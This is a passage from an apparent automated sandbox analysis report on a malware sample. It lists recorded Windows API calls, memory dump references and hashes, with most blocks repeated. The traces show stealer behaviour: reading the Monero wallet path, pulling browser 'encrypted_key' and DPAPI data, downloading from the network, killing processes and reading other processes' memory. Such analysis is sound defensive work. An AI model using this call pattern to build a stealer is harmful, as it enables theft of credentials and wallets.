                                                              • RegCloseKey.ADVAPI32(?), ref: 0040105D
                                                              Strings
                                                              • SOFTWARE\monero-project\monero-core, xrefs: 0040102F
                                                              • wallet_path, xrefs: 0040104D
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                              • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                              • API String ID: 3466090806-4244082812
                                                              • Opcode ID: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
                                                              • Instruction ID: 56cdd2726f40904dd9986b82161546f6f5fb1bd65c94bb362b351e19f11762fa
                                                              • Opcode Fuzzy Hash: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
                                                              • Instruction Fuzzy Hash: B2F09075A40308BFD7049BA09C4DFEB7B7DEB04715F100059FE05E2290D7B45A448BE0
                                                              APIs
                                                              • InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 02479376
                                                              • InternetOpenUrlA.WININET(00000000,004350EC,00000000,00000000,80000000,00000000), ref: 02479393
                                                              • InternetCloseHandle.WININET(00000000), ref: 024793A0
                                                                • Part of subcall function 02488117: memchr.MSVCRT ref: 02488156
                                                                • Part of subcall function 02488117: memcmp.MSVCRT(00000000,?,?,?,00435108,00000000), ref: 02488170
                                                                • Part of subcall function 02488117: memchr.MSVCRT ref: 0248818F
                                                                • Part of subcall function 02478C17: std::_Xinvalid_argument.LIBCPMT ref: 02478C2D
                                                              • strlen.MSVCRT ref: 024793BC
                                                              • InternetReadFile.WININET(?,?,?,00000000), ref: 024793FD
                                                              • InternetReadFile.WININET(00000000,?,00001000,?), ref: 0247942E
                                                              • InternetCloseHandle.WININET(00000000), ref: 02479439
                                                              • InternetCloseHandle.WININET(00000000), ref: 02479440
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Internet$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_strlen
                                                              • String ID:
                                                              • API String ID: 1093921401-0
                                                              • Opcode ID: 2df68befe2a48d953af9806ad3ef1aaa75e141ea7b2b3915444889022231d2c0
                                                              • Instruction ID: b0676c230008e923b877d40cdfa2fa749e915eb47c99956160b0f5dd61a3b99b
                                                              • Opcode Fuzzy Hash: 2df68befe2a48d953af9806ad3ef1aaa75e141ea7b2b3915444889022231d2c0
                                                              • Instruction Fuzzy Hash: AD51E371A00204ABDB20DFA8DC44BEEF7F9EB48714F14152AF505E3380DBB4EA459BA5
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00424779
                                                              • Process32First.KERNEL32(00000000,00000128), ref: 00424789
                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 0042479B
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004247BC
                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 004247CB
                                                              • CloseHandle.KERNEL32(00000000), ref: 004247D2
                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 004247E0
                                                              • CloseHandle.KERNEL32(00000000), ref: 004247EB
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                              • String ID:
                                                              • API String ID: 3836391474-0
                                                              • Opcode ID: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                                                              • Instruction ID: 367f00e3fac1ad323777d3cfb6a9c31bedb6582ea87d99118442d47bc1b8c7be
                                                              • Opcode Fuzzy Hash: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                                                              • Instruction Fuzzy Hash: 65019271701224AFE7215B30ACC9FEB777DEB88751F00119AF905D2290EFB48D908AA4
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0247EB2A
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0247EB5C
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0247EBAB
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0247EBD1
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0247EC09
                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0247EC3F
                                                              • FindClose.KERNEL32(00000000), ref: 0247EC4E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$Find$CloseFileNext
                                                              • String ID:
                                                              • API String ID: 1875835556-0
                                                              • Opcode ID: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
                                                              • Instruction ID: 3fb55458fc713f528b08dff0a58e3d20cd42c418368aaf4598fb8b62cdcc4768
                                                              • Opcode Fuzzy Hash: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
                                                              • Instruction Fuzzy Hash: 4702E974B012118FDB28CF29C588BA6B7E5AF44718F19C6EED8199B3A1D772D842CF50
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0247EB2A
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0247EB5C
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0247EBAB
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0247EBD1
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0247EC09
                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0247EC3F
                                                              • FindClose.KERNEL32(00000000), ref: 0247EC4E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$Find$CloseFileNext
                                                              • String ID:
                                                              • API String ID: 1875835556-0
                                                              • Opcode ID: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
                                                              • Instruction ID: 3fb55458fc713f528b08dff0a58e3d20cd42c418368aaf4598fb8b62cdcc4768
                                                              • Opcode Fuzzy Hash: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
                                                              • Instruction Fuzzy Hash: 4702E974B012118FDB28CF29C588BA6B7E5AF44718F19C6EED8199B3A1D772D842CF50
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0247EB2A
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0247EB5C
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0247EBAB
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0247EBD1
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0247EC09
                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0247EC3F
                                                              • FindClose.KERNEL32(00000000), ref: 0247EC4E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$Find$CloseFileNext
                                                              • String ID:
                                                              • API String ID: 1875835556-0
                                                              • Opcode ID: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
                                                              • Instruction ID: 3fb55458fc713f528b08dff0a58e3d20cd42c418368aaf4598fb8b62cdcc4768
                                                              • Opcode Fuzzy Hash: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
                                                              • Instruction Fuzzy Hash: 4702E974B012118FDB28CF29C588BA6B7E5AF44718F19C6EED8199B3A1D772D842CF50
                                                              APIs
                                                              • strlen.MSVCRT ref: 0249238A
                                                              • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,02492686,00000000,00000000,00000000), ref: 024923B8
                                                              • VirtualQueryEx.KERNEL32(00000000,00000000,?,0000001C), ref: 02492408
                                                              • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00064000,00000000), ref: 02492469
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MemoryProcessQueryReadVirtualstrlen
                                                              • String ID:
                                                              • API String ID: 3366127311-0
                                                              • Opcode ID: 237dd88af5c74adab4b13bca57ee1463c3df570b0aab9420e182108aa891172b
                                                              • Instruction ID: d0e1c6cf82bd7ebf1cab8c4f32ee6754bb3eaf6e6ff2da7b7fd642e8473a995c
                                                              • Opcode Fuzzy Hash: 237dd88af5c74adab4b13bca57ee1463c3df570b0aab9420e182108aa891172b
                                                              • Instruction Fuzzy Hash: E271B171A00119ABDF24CFA8D954AAFBBB6EB88724F14812AED15E7340D774DD41CBA0
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(?), ref: 0040717E
                                                              • GetProcessHeap.KERNEL32(00000008,00000010), ref: 004071B9
                                                              • HeapAlloc.KERNEL32(00000000), ref: 004071C0
                                                              • memcpy.MSVCRT(00000000,?), ref: 004071ED
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00407203
                                                              • HeapFree.KERNEL32(00000000), ref: 0040720A
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00407269
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heap$Process$AddressAllocFreeLibraryLoadProcmemcpy
                                                              • String ID:
                                                              • API String ID: 1745114167-0
                                                              • Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                              • Instruction ID: 12ab2d4fc661ad8143b60d879bbfd3a328605d63d86a8d422f2a9a3c01bded70
                                                              • Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                              • Instruction Fuzzy Hash: FE416D71B046059BD720CFA9DC84BAAB3E9FB84305F1445BEE849D7380E739E8508B65
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(?), ref: 024773E5
                                                              • GetProcessHeap.KERNEL32(00000008,00000010), ref: 02477420
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02477427
                                                              • memcpy.MSVCRT(00000000,?), ref: 02477454
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0247746A
                                                              • HeapFree.KERNEL32(00000000), ref: 02477471
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 024774D0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProcmemcpy
                                                              • String ID:
                                                              • API String ID: 413393563-0
                                                              • Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                              • Instruction ID: d5a31c3b07f70e9123bb5173119c919d24209742eb86937da5706cb5882af23d
                                                              • Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                              • Instruction Fuzzy Hash: AB416E71B007059BDB20CF69ED84BAAF7E9EB84309F5445AAE85DC7310E775E810CBA0
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000), ref: 00409D08
                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00409D3A
                                                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D63
                                                              • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D9C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocLocallstrcpymemcmp
                                                              • String ID: $"encrypted_key":"$DPAPI
                                                              • API String ID: 4154055062-738592651
                                                              • Opcode ID: d77c832db12349da7b30ba69df4ba2cf0c7857204c4570defeb58a77868b8b7c
                                                              • Instruction ID: 867cb166c61f41a869f23d409f67d1e1a1a1e3bdbbf69cd9a3e784fd9bca4893
                                                              • Opcode Fuzzy Hash: d77c832db12349da7b30ba69df4ba2cf0c7857204c4570defeb58a77868b8b7c
                                                              • Instruction Fuzzy Hash: 76418A71A0020A9BDB10EF65CD856AF77B5AF44308F04417AE954BB3E2DA78ED05CB98
                                                              APIs
                                                              • strtok_s.MSVCRT ref: 00417F84
                                                              • lstrlenA.KERNEL32(00000000), ref: 00417FB1
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00417FE0
                                                              • strtok_s.MSVCRT ref: 00417FF1
                                                              • StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418025
                                                              • StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418053
                                                              • StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418087
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: strtok_s$lstrcpylstrlen
                                                              • String ID:
                                                              • API String ID: 348468850-0
                                                              • Opcode ID: 0c468244a8143168505cd9d6d1ab1f94799bd3f5708272a995eed29db236200c
                                                              • Instruction ID: 476cfacc260c43b9b6707cb97608d97a847e356c1d56728458ea849191fa1f26
                                                              • Opcode Fuzzy Hash: 0c468244a8143168505cd9d6d1ab1f94799bd3f5708272a995eed29db236200c
                                                              • Instruction Fuzzy Hash: D0417F34A0450ADFCB21DF18D884EEB77B4FF44304F12409AE805AB351DB79AAA6CF95
                                                              APIs
                                                              • strtok_s.MSVCRT ref: 0248836C
                                                              • lstrlen.KERNEL32(00000000), ref: 024883B2
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024883E1
                                                              • StrCmpCA.SHLWAPI(00000000,00435204), ref: 024883F9
                                                              • lstrlen.KERNEL32(00000000), ref: 02488437
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02488466
                                                              • strtok_s.MSVCRT ref: 02488476
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpylstrlenstrtok_s
                                                              • String ID:
                                                              • API String ID: 3280532728-0
                                                              • Opcode ID: 43023dec0009249c1699197493f64402cd777fe6b66fe5db91421765cffb73b4
                                                              • Instruction ID: ef00512031e35840f8def6fa7bede836201ed6a9dcb825b9a24717a7b760361b
                                                              • Opcode Fuzzy Hash: 43023dec0009249c1699197493f64402cd777fe6b66fe5db91421765cffb73b4
                                                              • Instruction Fuzzy Hash: CA416A7661020A9FDB21EF68D984BAEBBB5EF44704F00801AEC59D7245EB74D941CFA0
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 024757F0
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 024757F7
                                                              • InternetOpenA.WININET(0042D01C,00000000,00000000,00000000,00000000), ref: 0247580D
                                                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 02475828
                                                              • InternetReadFile.WININET(?,?,00000400,00000001), ref: 02475853
                                                              • InternetCloseHandle.WININET(?), ref: 02475892
                                                              • InternetCloseHandle.WININET(00000000), ref: 02475899
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                                              • String ID:
                                                              • API String ID: 3066467675-0
                                                              • Opcode ID: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
                                                              • Instruction ID: 3e10ef68d211db66c83e64d234da0e04df3db1aad1ea5780371c3da2c54428e0
                                                              • Opcode Fuzzy Hash: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
                                                              • Instruction Fuzzy Hash: 31417B70A00209AFDB24CF55DC48BDAB7B5FF48314F5480AEE919AB3A0D7B1A941CF94
                                                              APIs
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00417DD8
                                                                • Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
                                                                • Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00417DF6
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00417E11
                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00417CFA,00000000,?,?,00000000,?,004091B6,?), ref: 00417E74
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Xinvalid_argumentstd::_$Exception@8Throwmemcpystd::exception::exception
                                                              • String ID: invalid string position$string too long
                                                              • API String ID: 702443124-4289949731
                                                              • Opcode ID: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
                                                              • Instruction ID: 79f032b162a4ed5f1b8d8c3a7f5ff0854d2ec62b836a1cb7fb32b648417a52a7
                                                              • Opcode Fuzzy Hash: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
                                                              • Instruction Fuzzy Hash: 5921C3323047008BD7249E2CE980B6AB7F5AF95720F604A6FF4968B381D775DC8187A9
                                                              APIs
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 004088B3
                                                                • Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
                                                                • Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
